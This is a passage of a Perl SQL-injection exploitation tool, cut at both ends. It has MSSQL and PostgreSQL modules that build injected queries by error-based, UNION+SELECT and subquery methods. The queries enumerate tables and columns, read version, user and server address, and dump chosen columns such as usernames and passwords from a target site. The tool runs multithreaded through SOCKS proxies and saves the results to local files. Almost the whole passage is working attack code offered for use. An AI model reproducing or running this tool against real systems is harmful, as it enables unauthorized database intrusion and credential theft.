          # every request into the on-disk log.
          if ($ms_convert_in == 0) {
                $current = $ms_url . "(select" . $ms_spase . "max(column_name)" . $ms_spase . "from" . $ms_spase . "(select". $ms_spase ."top". $ms_spase ."1". $ms_spase ."column_name". $ms_spase ."from". $ms_spase ."information_schema.columns". $ms_spase ."where". $ms_spase ."table_name=". $table . $ms_spase . "and". $ms_spase ."column_name". $ms_spase ."not". $ms_spase ."in". $ms_spase ."(select". $ms_spase ."top". $ms_spase . $i . $ms_spase . "column_name". $ms_spase ."from". $ms_spase ."information_schema.columns" . $ms_spase ."where". $ms_spase ."table_name=". $table . $ms_spase ."order". $ms_spase . "by". $ms_spase ."column_name)". $ms_spase ."order". $ms_spase ."by". $ms_spase ."column_name)a)" . $ms_close;
                print FILE "  "  . $current . "\n";

          } else {
                $current = $ms_url . "convert(int,(select" . $ms_spase . "max(column_name)" . $ms_spase . "from" . $ms_spase . "(select". $ms_spase ."top". $ms_spase ."1". $ms_spase ."column_name". $ms_spase ."from". $ms_spase ."information_schema.columns". $ms_spase ."where". $ms_spase ."table_name=". $table . $ms_spase . "and". $ms_spase ."column_name". $ms_spase ."not". $ms_spase ."in". $ms_spase ."(select". $ms_spase ."top". $ms_spase . $i . $ms_spase . "column_name". $ms_spase ."from". $ms_spase ."information_schema.columns" . $ms_spase ."where". $ms_spase ."table_name=". $table . $ms_spase ."order". $ms_spase . "by". $ms_spase ."column_name)". $ms_spase ."order". $ms_spase ."by". $ms_spase ."column_name)a))"  . $ms_close;
                print FILE "  "  . $current . "\n";

          }
          $content = scan_url();   # presumably issues the request for the global $current — confirm
          if ($content =~ m/$ms_pattern_data1/imgs || $content =~ m/$ms_pattern_data2/imgs || $content =~ m/$ms_pattern_data3/imgs) {
               print "   " . $1 . "\n";    # $1 is from whichever alternative matched
               print FILE "  "  . $1 . "\n";
               #print FILE "  "  . $current . "\n";
          }
          print $num . "\r";
          sleep $pause;       # inter-request delay (global, set elsewhere)

       }
   }
  5699.      print "----------\n";
  5700.      print "Saved in " . "z_" . $host . ".txt\n";
  5701.      close(FILE);
  5702.      goto START_mssql;
  5703. }
  5704. if ($choice == 4) {
  5705.     $host = $host7;
  5706.     open( FILE, ">>" . "z_" .$host . ".txt" ); # ???? ??? ?????? ???????????
  5707.     print "-----------------------------------------\n";
  5708.     print "Enter the table_name: ";
  5709.     $choice1 = <STDIN>;
  5710.     chomp $choice1;
  5711.     $table = $choice1;
  5712.     print "Table: $table\n";
  5713.     print "-----------------------------------------\n";
  5714.     print "Enter the column(s) name(s) - for example - id or id,username,user_password:\n";
  5715.     $choice = <STDIN>;
  5716.     chomp $choice;
  5717.     $column_name1 = $choice;
  5718.     $column_name = "cast(" . $choice . $ms_spase . "as" . $ms_spase . "varchar)";
  5719.     @column_spis = split(/,/,$column_name);
  5720.     $size = @column_spis;
  5721.     if ($size > 1) {
  5722.        $column_name = "cast(";
  5723.        $a = 0;
  5724.        while ($a < $size) {
  5725.         if ($a == ($size-1)) {
  5726.           $column_name .= $column_spis[$a] . $ms_spase . "as" . $ms_spase . "varchar)";
  5727.         } else {
  5728.           $column_name .= $column_spis[$a] . $ms_spase . "as" . $ms_spase . "varchar)%2Bchar(58)%2Bcast(";
  5729.         }
  5730.           $a++;
  5731.        }
  5732.     }
  5733.     print FILE  "-----------------------------------------\n";
  5734.     print FILE  "Dump column(s): [ " . $column_name1 . " ] from [ " . $table . " ]\n";
  5735.     print FILE  "-----------------------------------------\n";
  5736.     print "Dump column(s): [ " . $column_name1 . " ] from [ " .$table . " ]\n";
  5737.     print "-----------------------------------------\n";
  5738.     ## ?????? ???-?? ???????? ?? ??????? #
  5739.     print "Count data from [ $choice1  ]\n";
  5740.     $current = $ms_url . "convert(int,(select" . $ms_spase . "TOP" . $ms_spase . "1". $ms_spase . "mid(char(39)%2bchar(94)%2bchar(39)%2BCAST(COUNT(*)%20AS%20varchar),1,1000)" . $ms_spase . "FROM" . $ms_spase . $table . "))" . $ms_close;
  5741.     $content = scan_url();
  5742.     $column_name_p1 = $content;
  5743.     if ($column_name_p1 =~ m/$ms_pattern_data1/imgs || $column_name_p1 =~ m/$ms_pattern_data2/imgs || $column_name_p1 =~ m/$ms_pattern_data3/imgs) {
  5744.         ($a,$column_name_p) = split(/\'\^\'/, $1);
  5745.     }
  5746.     print "$column_name_p\n";
  5747.     print "----------\n";
  5748.     print "Get ALL data from " . $table . " (" . $column_name_p . ") ? (1/0): ";
  5749.     $choice = <STDIN>;
  5750.     chomp $choice;
  5751.     $thr = $kol_threads; # ???-?? ???????
  5752.     if ($choice == 1) {
  5753.           $num = 0; # ?? ????????
  5754.     } else {
  5755.           print "Enter START_position: ";
  5756.           $choice1 = <STDIN>;
  5757.           chomp $choice1;
  5758.           $num = $choice1-1;
  5759.           print "Enter END_position: ";
  5760.           $choice2 = <STDIN>;
  5761.           chomp $choice2;
  5762.           $column_name_p = $choice2-1;
  5763.           print "Dump records from [" . ($num+1) . "] to [" . ($column_name_p+1) . "]\n";
  5764.     }
  5765.     print "-----------------------------------------\n";
  5766.     print "Request method - $method\n";
  5767.     print "Threads - $kol_threads\n";
  5768.     print "Proxy - $proxy_message\n";
  5769.     print "----------------------\n";
  5770.     ## ?????? ?????? ?? ??????? ##
  5771.     for(0..$thr) {
  5772.           $trl[$_] = threads->create(\&gets668);
  5773.     }
  5774.     for(0..$thr) {
  5775.           $trl[$_]->join;
  5776.     }
   sub gets668 {
       # Worker body for MSSQL "get data from columns".  $num (threads::shared) is the row
       # offset and $column_name_p the last offset to fetch; the caller sets both either from
       # the row count or from the START/END positions typed at the prompt.  $table,
       # $column_name (the cast(...) expression) and $column_name1 (the raw column list used
       # for ORDER BY) come straight from prompt input; $ms_url/$ms_spase/$ms_close/
       # $ms_convert_in and the $ms_pattern_data* regexes are globals defined outside this
       # excerpt; FILE is the caller's append-mode log.
       $| = 1;   # autoflush STDOUT for the "\r" progress counter
       while ($num<$column_name_p) {
          { lock($num);
          $num++; }
          $i = $num;   # NOTE(review): re-read after the lock is released; per-thread copy under ithreads
          # Two request shapes, chosen by $ms_convert_in; $i is the number of rows skipped.
          if ($ms_convert_in == 0) {
               $current = $ms_url . "(select" . $ms_spase . "top" . $ms_spase . "1". $ms_spase . $column_name . $ms_spase . "from" . $ms_spase . $table . $ms_spase . "where" . $ms_spase . $column_name . $ms_spase ."not". $ms_spase ."in". $ms_spase ."(select". $ms_spase ."top". $ms_spase . $i . $ms_spase . $column_name . $ms_spase ."from". $ms_spase . $table . $ms_spase . "order". $ms_spase . "by". $ms_spase . $column_name1 . ")". $ms_spase ."order". $ms_spase ."by". $ms_spase . $column_name1 . ")" . $ms_close;
          } else {
               $current = $ms_url . "convert(int,(select" . $ms_spase . "top" . $ms_spase . "1". $ms_spase . $column_name . $ms_spase . "from" . $ms_spase . $table . $ms_spase . "where" . $ms_spase . $column_name . $ms_spase ."not". $ms_spase ."in". $ms_spase ."(select". $ms_spase ."top". $ms_spase . $i . $ms_spase . $column_name . $ms_spase ."from". $ms_spase . $table . $ms_spase . "order". $ms_spase . "by". $ms_spase . $column_name1 . ")". $ms_spase ."order". $ms_spase ."by". $ms_spase . $column_name1 . "))" .  $ms_close;
          }
          $content = scan_url();   # presumably issues the request for the global $current — confirm
          if ($content =~ m/$ms_pattern_data1/imgs || $content =~ m/$ms_pattern_data2/imgs || $content =~ m/$ms_pattern_data3/imgs) {
               print "   " . $1 . "\n";    # $1 is from whichever alternative matched
               print FILE "  "  . $1 . "\n";
          }
          print $num . "\r";
          sleep $pause;       # inter-request delay (global, set elsewhere)

       }
   }
  5798.     print "----------\n";
  5799.     print "Saved in " . "z_" . $host . ".txt\n";
  5800.     close(FILE);
  5801.     goto START_mssql;
  5802. } # end MSSQL
  5803. if ($choice == 5) {goto START_global}
  5804. }
  5805. ######################################################################################################################
  5806. ## PostgreSQL ##############
  5807. if ($choice == 3) {
  5808. START_ps:
  5809. $host = $host8;
  5810. if ($use_socks == 1 && $socks_check == 0 && $https_flag == 0) {
  5811.   $check_url = $host;
  5812.   our $query = "GET / HTTP/1.$http_protocol\r\n"
  5813.            . "Host: $check_host\r\n"
  5814.            . "Referer: http://" . $check_url . "\r\n"
  5815.            . "Accept: */*\r\n"
  5816.            . "User-Agent: Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090716 Ubuntu/9.04 (jaunty) Shiretoko/3.5.1\r\n"
  5817.            . "Connection: close\r\n\r\n";
  5818.    print "----------------------------------------\n";
  5819.    print "You choose mode with SOCKS, try to find good in $socks_file ...\n";
  5820.    print "Timeout = 5 sec:\n";
  5821.    print "----------------------------------------\n";
  5822.    $socks_check = 0;
  5823.    $check_socks = socks_check();
  5824.   ($current_proxy_host,$current_proxy_port,$socks_type) = split(/:/,$check_socks);
  5825.   $proxy_message = "$current_proxy_host:$current_proxy_port, SOCKS" . $socks_type;
  5826.   if ($current_proxy_host) {
  5827.      $socks_check = 1;
  5828.      print "Will use --> $proxy_message\n";
  5829.   } else {
  5830.      $socks_check = 0;
  5831.      $proxy_message = "No";
  5832.      print "No good SOCKS in " . $socks_file . ", change mode. Exit...\n";
  5833.   }
  5834. }
  5835. sub char_p($) {
  5836.          $str1=$_[0];
  5837.          $aa="";$bb="";
  5838.          for ($i = 0; $i<length($str1); $i++ ) {
  5839.              $aa =  ord(substr($str1,$i,1));
  5840.              if ( $i == 0 ) {$bb= "chr(" . $aa . ")";} else { $bb= $bb. "||chr(" . $aa . ")" ;}
  5841.          }
  5842.          return "$bb";
  5843. }
  5844. print "----------------------------------------------------------\n";
  5845. print "               Choose mode:\n";
  5846. print "----------------------------------------------------------\n";
  5847. print "    [1] PostgreSQL inj system information\n";
  5848. print "    [2] PostgreSQL inj get tables from information_schema\n";
  5849. print "    [3] PostgreSQL inj get column_name from table\n";
  5850. print "    [4] PostgreSQL inj get data from columns\n";
  5851. print "    =======================================================\n";
  5852. print "    [5] Main menu\n";
  5853. print "----------------------------------------------------------\n";
  5854. $choice = <STDIN>;
  5855. chomp $choice;
  5856. print "Your choice: $choice\n";
  5857. ####################################################################################################################
  5858. ## UNION+SELECT method ##
  5859. if ($p_method == 0) {
  5860. if ($p_union_select_url =~ m/^https:\/\/?([^\/]+)/i) {
  5861.        $host8 = $1;
  5862.        $https_flag = 1;
  5863.        print "----------------------\n";
  5864.        print "HTTPS mode enabled\n";
  5865.        print "----------------------\n";
  5866. }
  5867. $host = $host8;
  5868. if ($https_mode_auth == 1 && $https_auth_check == 0 && $https_flag == 1) {
  5869.     print "-----------------------------------------\n";
  5870.     print "Authorization required, wait please....";
  5871.     my $answ1 = req($host, $https_auth_script_path, 'POST', $https_auth_post_data, 0);
  5872.     $ck1 = collect($answ1);
  5873.     $https_auth_check = 1;
  5874.     print " DONE\n";
  5875.     print "-----------------------------------------\n";
  5876. }
  5877. print "========================================\n";
  5878. print " PostgreSQL UNION+SELECT method\n";
  5879. print "========================================\n";
  5880. if ($choice == 1) {
  5881.      open( FILE, ">>" . "z_" . $host . ".txt" ); # ???? ??? ?????? ???????????
  5882.      $url1 = $p_sql_start . $p_sql_pref1 .  "cast(version()" . $p_plus . "as" . $p_plus . $p_convert . ")" . $p_sql_pref2 . $p_sql_end . $p_filtr;
  5883.      $url2 = $p_sql_start . $p_sql_pref1 .  "cast(current_user" . $p_plus . "as" . $p_plus . $p_convert . ")" . $p_sql_pref2 . $p_sql_end . $p_filtr;
  5884.      $url3 = $p_sql_start . $p_sql_pref1 .  "cast(current_database()" . $p_plus . "as" . $p_plus . $p_convert . ")" . $p_sql_pref2 . $p_sql_end . $p_filtr;
  5885.      $url4 = $p_sql_start . $p_sql_pref1 .  "cast(inet_server_addr()" . $p_plus . "as" . $p_plus . $p_convert . ")" . $p_sql_pref2 . $p_sql_end . $p_filtr;
  5886.      $url5 = $p_sql_start . $p_sql_pref1 .  "cast(inet_server_port()" . $p_plus . "as" . $p_plus . $p_convert . ")" . $p_sql_pref2 . $p_sql_end . $p_filtr;
  5887.      @array = ($url1,$url2,$url3,$url4,$url5);
  5888.      $size = @array; #???????? ?????? ???????
  5889.      $thr = $kol_threads; # ???-?? ???????
  5890.      $num = -1; # ?? ????????
  5891.      print "-----------------------------------------\n";
  5892.      print "System information:\n";
  5893.      print "-----------------------------------------\n";
  5894.      print FILE  "-----------------------------------------\n";
  5895.      print FILE  "HOST: $host\n";
  5896.      print FILE "-----------------------------------------\n";
  5897.      print FILE "System information:\n";
  5898.      print FILE "-----------------------------------------\n";
  5899.      print "Request method - $method\n";
  5900.      print "Threads - $kol_threads\n";
  5901.      print "Proxy - $proxy_message\n";
  5902.      print "----------------------\n";
  5903.      for(0..$thr) {
  5904.         $trl[$_] = threads->create(\&gets670);
  5905.      }
  5906.      for(0..$thr) {
  5907.         $trl[$_]->join;
  5908.      }
   sub gets670 {
       # Worker body for PostgreSQL (UNION+SELECT method) "system information".  @array holds
       # the five request URLs the caller built (version(), current_user, current_database(),
       # inet_server_addr(), inet_server_port()), $size is its length and $num (threads::shared)
       # the next index; the caller starts $kol_threads+1 workers, so most find nothing to do.
       # FILE is the caller's append-mode log handle.
       $| = 1;   # autoflush STDOUT for the "\r" progress counter
       while ($num<$size) {
           { lock($num);
           $num++; }
           # NOTE(review): $num is read again after the lock is released; past index 4,
           # $array[$num] is undef and $mess keeps its previous label.
           $current = $array[$num];
           if ($num == 0) {$mess = 'version(): '}
           if ($num == 1) {$mess = "current_user: "}
           if ($num == 2) {$mess = "current_database(): "}
           if ($num == 3) {$mess = "inet_server_addr(): "}
           if ($num == 4) {$mess = "inet_server_port(): "}
           $content = scan_url();   # presumably issues the request for the global $current — confirm
           # A hit is the ussr...ussr marker in the response; /s lets the capture span line breaks.
           if ($content =~ m/ussr(.*?)ussr/imgs) {
                 print $mess . $1 . "\n";
                 print FILE $mess . $1 . "\n";
           }
           print $num . "\r";
           sleep $pause;       # inter-request delay (global, set elsewhere)
       }
   }
  5929.      print "----------\n";
  5930.      print "Saved in " . "z_" . $host . ".txt\n";
  5931.      close(FILE);
  5932.      goto START_ps;
  5933. }
  5934. if ($choice == 2) {
  5935.      open( FILE, ">>" . "z_" .$host . ".txt" ); # ???? ??? ?????? ???????????
  5936.      $current = $p_sql_start . $p_sql_pref1 . "cast(count(*)" . $p_plus . "as" . $p_plus . $p_convert . ")" . $p_sql_pref2 . $p_sql_end . $p_plus . "from" . $p_plus . "information_schema.tables" . $p_filtr; # ??????? ???-?? ??????
  5937.      $content = scan_url();
  5938.      $tab_num = $content;
  5939.      $tab_num =~ m/ussr(.*?)ussr/imgs;
  5940.      $tab_num = $1; # ???-?? ???????? ? informaion_schema
  5941.      print "-----------------------------------------\n";
  5942.      print "Tables in information_schema.tables - $1\n";
  5943.      print "-----------------------------------------\n";
  5944.      ## start from2 ##
  5945.      print "Get ALL tables from information_schema ($1) ? (1/0): ";
  5946.      $choice = <STDIN>;
  5947.      chomp $choice;
  5948.      $thr = $kol_threads; # ???-?? ???????
  5949.      if ($choice == 1) {
  5950.           $num = -1; # ?? ????????
  5951.  
  5952.      } else {
  5953.           print "Enter START_position: ";
  5954.           $choice1 = <STDIN>;
  5955.           chomp $choice1;
  5956.           $num = $choice1-2;
  5957.           print "Enter END_position: ";
  5958.           $choice2 = <STDIN>;
  5959.           chomp $choice2;
  5960.           $tab_num = $choice2-1;
  5961.           print "Dump records from [" . ($num+2) . "] to [" . ($tab_num+1) . "]\n";
  5962.      }
  5963.      print "-----------------------------------------\n";
  5964.      ## end from2
  5965.      print FILE  "-----------------------------------------\n";
  5966.      print FILE  "Tables in information_schema.tables - $1\n";
  5967.      print FILE  "-----------------------------------------\n";
  5968.      $url12 = $p_sql_start . $p_sql_pref1 . "cast(table_name" . $p_plus . "as" . $p_plus . $p_convert . ")" . $p_sql_pref2 . $p_sql_end . $p_plus . "from" . $p_plus . "information_schema.tables" . $p_plus . "limit" . $p_plus . "1";
  5969.      print "Request method - $method\n";
  5970.      print "Threads - $kol_threads\n";
  5971.      print "Proxy - $proxy_message\n";
  5972.      print "----------------------\n";
  5973.      for(0..$thr) {
  5974.          $trl[$_] = threads->create(\&gets671);
  5975.      }
  5976.      for(0..$thr) {
  5977.          $trl[$_]->join;
  5978.      }
  5979.      sub gets671 {
  5980.        $| = 1;
  5981.        while ($num<$tab_num) {
  5982.          { lock($num);
  5983.          $num++; }
  5984.          $current = $url12 . $p_plus . "offset" . $p_plus . $num . $p_filtr;
  5985.          $content = scan_url();
  5986.          if ($content =~ m/ussr(.*?)ussr/imgs) {
  5987.                   print $1 . "\n";
  5988.                   print FILE $1 . "\n";
  5989.          }
  5990.          print $num . "\r";
  5991.          sleep $pause;
  5992.  
  5993.        }
  5994.      }
  5995.     print "----------\n";
  5996.     print "Saved in " . "z_" . $host . ".txt\n";
  5997.     close(FILE);
  5998.     goto START_ps;
  5999. }
  6000. if ($choice == 3) {
  6001.     open( FILE, ">>" . "z_" .$host . ".txt" ); # ???? ??? ?????? ???????????
  6002.     print "-----------------------------------------\n";
  6003.     print "Enter the table_name: ";
  6004.     $choice = <STDIN>;
  6005.     chomp $choice;
  6006.     print "Table: $choice\n";
  6007.     print "----------\n";
  6008.     print FILE  "-----------------------------------------\n";
  6009.     print FILE  "Table [ $choice ]\n";
  6010.     print FILE  "-----------------------------------------\n";
  6011.     $table_name1 = $choice;
  6012.     $table_name = char_p ($choice);
  6013.     $current = $p_sql_start . $p_sql_pref1 . "cast(count(*)" . $p_plus . "as" . $p_plus . $p_convert . ")" . $p_sql_pref2 . $p_sql_end . $p_plus . "from" . $p_plus . "information_schema.columns" . $p_plus . "where" . $p_plus . "table_name=" . $table_name . $p_filtr;
  6014.     $content = scan_url();
  6015.     $content =~ m/ussr(.*?)ussr/imgs;
  6016.     $colum_number = $1; # ???-?? ??????? ? ??????????? ?????
  6017.     print "Number of columns in " . $table_name1 . ": $colum_number\n";
  6018.     print FILE  "Number of columns in " . $table_name1 . ": $colum_number\n";
  6019.     print "----------\n";
  6020.     ## ?????? ??????? ##
  6021.     $thr = $kol_threads; # ???-?? ???????
  6022.     $num = -1; # ?? ????????
  6023.     print "Request method - $method\n";
  6024.     print "Threads - $kol_threads\n";
  6025.     print "Proxy - $proxy_message\n";
  6026.     print "----------------------\n";
  6027.     $url15 = $p_sql_start . $p_sql_pref1 . "cast(column_name" . $p_plus . "as" . $p_plus . $p_convert . ")" . $p_sql_pref2 . $p_sql_end . $p_plus . "from" . $p_plus . "information_schema.columns" . $p_plus . "where" . $p_plus . "table_name=" . $table_name . $p_plus . "limit" . $p_plus . "1";
  6028.     print FILE  "Columns in " . $table_name1 . "\n";
  6029.     for(0..$thr) {
  6030.          $trl[$_] = threads->create(\&gets672);
  6031.     }
  6032.     for(0..$thr) {
  6033.          $trl[$_]->join;
  6034.     }
  6035.     sub gets672 {
  6036.        $| = 1;
  6037.        while ($num<$colum_number) {
  6038.          { lock($num);
  6039.          $num++; }
  6040.          $current = $url15 . $p_plus . "offset" . $p_plus . $num . $p_filtr;
  6041.          $content = scan_url();
  6042.          if ($content =~ m/ussr(.*?)ussr/imgs) {
  6043.                   print "   " . $1 . "\n";
  6044.                   print FILE "  "  . $1 . "\n";
  6045.          }
  6046.          print $num . "\r";
  6047.          sleep $pause;
  6048.  
  6049.        }
  6050.     }
  6051.     print FILE "----------\n";
  6052.     print "----------\n";
  6053.     print "Saved in " . "z_" . $host . ".txt\n";
  6054.     close(FILE);
  6055.     goto START_ps;
  6056. }
  6057. if ($choice == 4) {
  6058.     open( FILE, ">>" . "z_" .$host . ".txt" ); # ???? ??? ?????? ???????????
  6059.     print "-----------------------------------------\n";
  6060.     print "Enter the table_name: ";
  6061.     $choice = <STDIN>;
  6062.     chomp $choice;
  6063.     $table_name = $choice;
  6064.     print "Table: $table_name\n";
  6065.     print "-----------------------------------------\n";
  6066.     print "Enter the column(s) name(s) - for example - id or id,username,user_password:\n";
  6067.     $choice = <STDIN>;
  6068.     chomp $choice;
  6069.     $column_name1 = $choice;
  6070.     $column_name = $choice;
  6071.     @column_spis = split(/,/,$column_name);
  6072.     $size = @column_spis;
  6073.     if ($size > 1) {
  6074.        $column_name = "";
  6075.        $a = 0;
  6076.        while ($a < $size) {
  6077.         if ($a == ($size-1)) {
  6078.           $column_name .= $column_spis[$a];
  6079.         } else {
  6080.           $column_name .= $column_spis[$a] . "||chr(58)||";
  6081.         }
  6082.           $a++;
  6083.        }
  6084.     }
  6085.     print FILE  "-----------------------------------------\n";
  6086.     print FILE  "Dump column(s): [ " . $column_name1 . " ] from [ " .$table_name . " ]\n";
  6087.     print FILE  "-----------------------------------------\n";
  6088.     print "Dump column(s): [ " . $column_name1. " ] from [ " .$table_name . " ]\n";
  6089.     print "-----------------------------------------\n";
  6090.     ## ?????? ???-?? ???????? ?? ??????? #
  6091.     print "Count data from [ $table_name  ]\n";
  6092.     $current = $p_sql_start . $p_sql_pref1 . "cast(count(*)" . $p_plus . "as" . $p_plus . $p_convert . ")" . $p_sql_pref2 . $p_sql_end . $p_plus . "from" . $p_plus . $table_name . $p_filtr;
  6093.     $content = scan_url();
  6094.     $column_name_p = $content;
  6095.     $column_name_p =~ m/ussr(.*?)ussr/imgs;
  6096.     $column_name_p = $1; # ???-?? ???????? ? ??????? ?? ????????? ???????
  6097.     print "$column_name_p\n";
  6098.     print "----------\n";
  6099.     print "Get ALL data from " . $table_name . " (" . $column_name_p . ") ? (1/0): ";
  6100.     $choice = <STDIN>;
  6101.     chomp $choice;
  6102.     $thr = $kol_threads; # ???-?? ???????
  6103.     if ($choice == 1) {
  6104.          $num = -1; # ?? ????????
  6105.     } else {
  6106.          print "Enter START_position: ";
  6107.          $choice1 = <STDIN>;
  6108.          chomp $choice1;
  6109.          $num = $choice1-2;
  6110.          print "Enter END_position: ";
  6111.          $choice2 = <STDIN>;
  6112.          chomp $choice2;
  6113.          $column_name_p = $choice2-1;
  6114.          print "Dump records from [" . ($num+2) . "] to [" . ($column_name_p+1) . "]\n";
  6115.     }
  6116.     print "-----------------------------------------\n";
  6117.     print "Request method - $method\n";
  6118.     print "Threads - $kol_threads\n";
  6119.     print "Proxy - $proxy_message\n";
  6120.     print "----------------------\n";
  6121.     ## ?????? ?????? ?? ??????? ##
  6122.     $url17 = $p_sql_start . $p_sql_pref1 . "cast(" . $column_name . $p_plus . "as" . $p_plus . $p_convert . ")" . $p_sql_pref2 . $p_sql_end . $p_plus . "from" . $p_plus . $table_name . $p_plus . "limit" . $p_plus . "1";
  6123.     for(0..$thr) {
  6124.         $trl[$_] = threads->create(\&gets673);
  6125.     }
  6126.     for(0..$thr) {
  6127.         $trl[$_]->join;
  6128.     }
  6129.     sub gets673 {
  6130.             $| = 1;
  6131.             while ($num<$column_name_p) {
  6132.                { lock($num);
  6133.                $num++; }
  6134.                $current = $url17 . $p_plus . "offset" . $p_plus . $num . $p_filtr;
  6135.                $content = scan_url();
  6136.                if ($content =~ m/ussr(.*?)ussr/imgs) {
  6137.                     print "   " . $1 . "\n";
  6138.                     print FILE "  "  . $1 . "\n";
  6139.                }
  6140.                print $num . "\r";
  6141.                sleep $pause;
  6142.  
  6143.             }
  6144.     }
  6145.     print "----------\n";
  6146.     print "Saved in " . "z_" . $host . ".txt\n";
  6147.     close(FILE);
  6148.     goto START_ps;
  6149. }
  6150. }
  6151. ####################################################################################################################
  6152.  
  6153. ## Subquery method ##
  6154. if ($p_method == 1) {
  6155. if ($p_subquery_url =~ m/^https:\/\/?([^\/]+)/i) {
  6156.        $host8 = $1;
  6157.        $https_flag = 1;
  6158.        print "----------------------\n";
  6159.        print "HTTPS mode enabled\n";
  6160.        print "----------------------\n";
  6161. }
  6162. $host = $host8;
  6163. if ($https_mode_auth == 1 && $https_auth_check == 0 && $https_flag == 1) {
  6164.     print "-----------------------------------------\n";
  6165.     print "Authorization required, wait please....";
  6166.     my $answ1 = req($host, $https_auth_script_path, 'POST', $https_auth_post_data, 0);
  6167.     $ck1 = collect($answ1);
  6168.     $https_auth_check = 1;
  6169.     print " DONE\n";
  6170.     print "-----------------------------------------\n";
  6171. }
  6172. print "========================================\n";
  6173. print " PostgreSQL SUBQUERY method\n";
  6174. print "========================================\n";
  6175. if ($choice == 1) {
  6176.      open( FILE, ">>" . "z_" . $host . ".txt" ); # ???? ??? ?????? ???????????
  6177.      $url1 = $p_subquery_url . "cast(" . $p_sql_pref1 . "version()" . $p_sql_pref2 . $p_plus . "as" . $p_plus . $p_convert . ")" . $p_filtr;
  6178.      $url2 = $p_subquery_url . "cast(" . $p_sql_pref1 . "current_user" . $p_sql_pref2 . $p_plus . "as" . $p_plus . $p_convert . ")" . $p_filtr;
  6179.      $url3 = $p_subquery_url . "cast(" . $p_sql_pref1 . "current_database()" . $p_sql_pref2 . $p_plus . "as" . $p_plus . $p_convert . ")" . $p_filtr;
  6180.      $url4 = $p_subquery_url . "cast(" . $p_sql_pref1 . "inet_server_addr()" . $p_sql_pref2 . $p_plus . "as" . $p_plus . $p_convert . ")" . $p_filtr;
  6181.      $url5 = $p_subquery_url . "cast(" . $p_sql_pref1 . "inet_server_port()" . $p_sql_pref2 . $p_plus . "as" . $p_plus . $p_convert . ")" . $p_filtr;
  6182.      @array = ($url1,$url2,$url3,$url4,$url5);
  6183.      $size = @array; #???????? ?????? ???????
  6184.      $thr = $kol_threads; # ???-?? ???????
  6185.      $num = -1; # ?? ????????
  6186.      print "-----------------------------------------\n";
  6187.      print "System information:\n";
  6188.      print "-----------------------------------------\n";
  6189.      print FILE  "-----------------------------------------\n";
  6190.      print FILE  "HOST: $host\n";
  6191.      print FILE "-----------------------------------------\n";
  6192.      print FILE "System information:\n";
  6193.      print FILE "-----------------------------------------\n";
  6194.      print "Request method - $method\n";
  6195.      print "Threads - $kol_threads\n";
  6196.      print "Proxy - $proxy_message\n";
  6197.      print "----------------------\n";
  6198.      for(0..$thr) {
  6199.         $trl[$_] = threads->create(\&gets813);
  6200.      }
  6201.      for(0..$thr) {
  6202.         $trl[$_]->join;
  6203.      }
  6204.      sub gets813 {
  6205.         $| = 1;
  6206.         while ($num<$size) {
  6207.             { lock($num);
  6208.             $num++; }
  6209.             $current = $array[$num];
  6210.             if ($num == 0) {$mess = 'version(): '}
  6211.             if ($num == 1) {$mess = "current_user: "}
  6212.             if ($num == 2) {$mess = "current_database(): "}
  6213.             if ($num == 3) {$mess = "inet_server_addr(): "}
  6214.             if ($num == 4) {$mess = "inet_server_port(): "}
  6215.             $content = scan_url();
  6216.             if ($content =~ m/ussr(.*?)ussr/imgs) {
  6217.                   print $mess . $1 . "\n";
  6218.                   print FILE $mess . $1 . "\n";
  6219.             }
  6220.             print $num . "\r";
  6221.             sleep $pause;
  6222.         }
  6223.      }
  6224.      print "----------\n";
  6225.      print "Saved in " . "z_" . $host . ".txt\n";
  6226.      close(FILE);
  6227.      goto START_ps;
  6228. }
  6229. if ($choice == 2) {
  6230.      open( FILE, ">>" . "z_" .$host . ".txt" ); # ???? ??? ?????? ???????????
  6231.      $current = $p_subquery_url . "cast((select" . $p_plus . $p_sql_pref1 . "count(*)" . $p_sql_pref2 . $p_plus . "from" . $p_plus . "information_schema.tables)" . $p_plus . "as" . $p_plus . $p_convert . ")" . $p_filtr;
  6232.      $content = scan_url();
  6233.      $tab_num = $content;
  6234.      $tab_num =~ m/ussr(.*?)ussr/imgs;
  6235.      $tab_num = $1; # ???-?? ???????? ? informaion_schema
  6236.      print "-----------------------------------------\n";
  6237.      print "Tables in information_schema.tables - $1\n";
  6238.      print "-----------------------------------------\n";
  6239.      ## start from2 ##
  6240.      print "Get ALL tables from information_schema ($1) ? (1/0): ";
  6241.      $choice = <STDIN>;
  6242.      chomp $choice;
  6243.      $thr = $kol_threads; # ???-?? ???????
  6244.      if ($choice == 1) {
  6245.           $num = -1; # ?? ????????
  6246.      } else {
  6247.           print "Enter START_position: ";
  6248.           $choice1 = <STDIN>;
  6249.           chomp $choice1;
  6250.           $num = $choice1-2;
  6251.           print "Enter END_position: ";
  6252.           $choice2 = <STDIN>;
  6253.           chomp $choice2;
  6254.           $tab_num = $choice2-1;
  6255.           print "Dump records from [" . ($num+2) . "] to [" . ($tab_num+1) . "]\n";
  6256.      }
  6257.      print "-----------------------------------------\n";
  6258.      ## end from2
  6259.      print FILE  "-----------------------------------------\n";
  6260.      print FILE  "Tables in information_schema.tables - $1\n";
  6261.      print FILE  "-----------------------------------------\n";
  6262.      $url12 = $p_subquery_url . "cast((select" . $p_plus . $p_sql_pref1 . "table_name" . $p_sql_pref2 . $p_plus . "from" . $p_plus . "information_schema.tables" . $p_plus . "limit" . $p_plus . "1";
  6263.      print "Request method - $method\n";
  6264.      print "Threads - $kol_threads\n";
  6265.      print "Proxy - $proxy_message\n";
  6266.      print "----------------------\n";
  6267.      for(0..$thr) {
  6268.          $trl[$_] = threads->create(\&gets814);
  6269.      }
  6270.      for(0..$thr) {
  6271.          $trl[$_]->join;
  6272.      }
  6273.      sub gets814 {
  6274.        $| = 1;
  6275.        while ($num<$tab_num) {
  6276.          { lock($num);
  6277.          $num++; }
  6278.          $current = $url12 . $p_plus . "offset" . $p_plus . $num . ")" . $p_plus . "as" . $p_plus . $p_convert . ")" . $p_filtr;
  6279.          $content = scan_url();
  6280.          if ($content =~ m/ussr(.*?)ussr/imgs) {
  6281.                   print $1 . "\n";
  6282.                   print FILE $1 . "\n";
  6283.          }
  6284.          print $num . "\r";
  6285.          sleep $pause;
  6286.  
  6287.        }
  6288.      }
  6289.     print "----------\n";
  6290.     print "Saved in " . "z_" . $host . ".txt\n";
  6291.     close(FILE);
  6292.     goto START_ps;
  6293. }
  6294. if ($choice == 3) {
  6295.     open( FILE, ">>" . "z_" .$host . ".txt" ); # ???? ??? ?????? ???????????
